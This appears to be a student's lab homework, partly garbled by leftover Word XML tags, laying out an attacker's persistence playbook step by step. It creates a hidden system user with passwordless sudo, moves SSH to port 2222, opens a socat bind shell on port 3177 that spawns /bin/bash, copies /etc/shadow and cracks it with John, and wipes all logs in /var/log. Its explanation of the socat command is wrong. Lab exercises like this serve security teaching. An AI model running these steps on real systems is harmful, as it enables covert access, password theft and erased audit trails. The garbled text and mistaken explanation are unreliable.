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Zachary Smith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 Submission for Unit 6 Advanced Bash Homework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secret user named `sysd`. Make sure this user doesn't have a home folder created.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sudo adduser --system --no-create-home sysd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Give your secret user a password.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sudo passwd sysd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Give your secret user a system UID &lt; 1000.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id -u sysd</w:t>
        <w:tab/>
        <w:t xml:space="preserve">output: 547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Give your secret user the same GID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 id -g sysd</w:t>
        <w:tab/>
        <w:t xml:space="preserve">output: 547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Give your secret user full sudo access without the need for a password.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sudo nano /etc/sudoers , added the line sysd ALL=(ALL:ALL) NOPASSWD:ALL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Test that sudo access works without your password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nano /etc/passwd , no password needed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passwd root , allowed me to change it with no password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```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 Allow ssh access over port 2222.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nano /etc/ssh/sshd_config , added Port 2222 under line #Port 22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```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Note the IP address of this system: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ifconfig , output: 192.168.23.131 (same as gitbash)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Exit the root accout.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exit (as root)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SSH to the machine using your sysd account and port 2222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ssh sysd@192.168.23.131 -p 2222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 sudo to switch to the root user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sudo su root (worked with no password)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### Create a backdoor with socat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Install socat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apt-get install socat (ran as root)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Run Socat command in the background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socat TCP4-Listen:3177,fork EXEC:/bin/bash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Explain each part of the `socat` command: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TCP4-Listen: listening on TCP protocol for IPv4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- 3177,: 3177 is the port it is listening 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fork EXEC:/bin/bash= creating a copy and putting it in /bin/bash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Exit the SSH session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exit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Test socat connection from your local machine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socat STDIO TCP4:192.168.23.131:3177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Close the `socat` connection.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exit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 Crack _all_ the passwords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Ssh back to the system using your sysd account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ssh syd@192.168.23.131 -p 2222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Use John to crack the entire /etc/shadow file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- cp /etc/passwd ~/passwd.txt and cp /etc/shadow ~/shadow.txt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- unshadow passwd.txt shadow.txt &gt; passwords.txt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- john passwords.txt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## Cover your tracks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Use socat and a for loop to clear all system logs.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While socat was running I did the loop [for log in $(ls /var/log); do echo '' &gt; /var/log/${log} ;done]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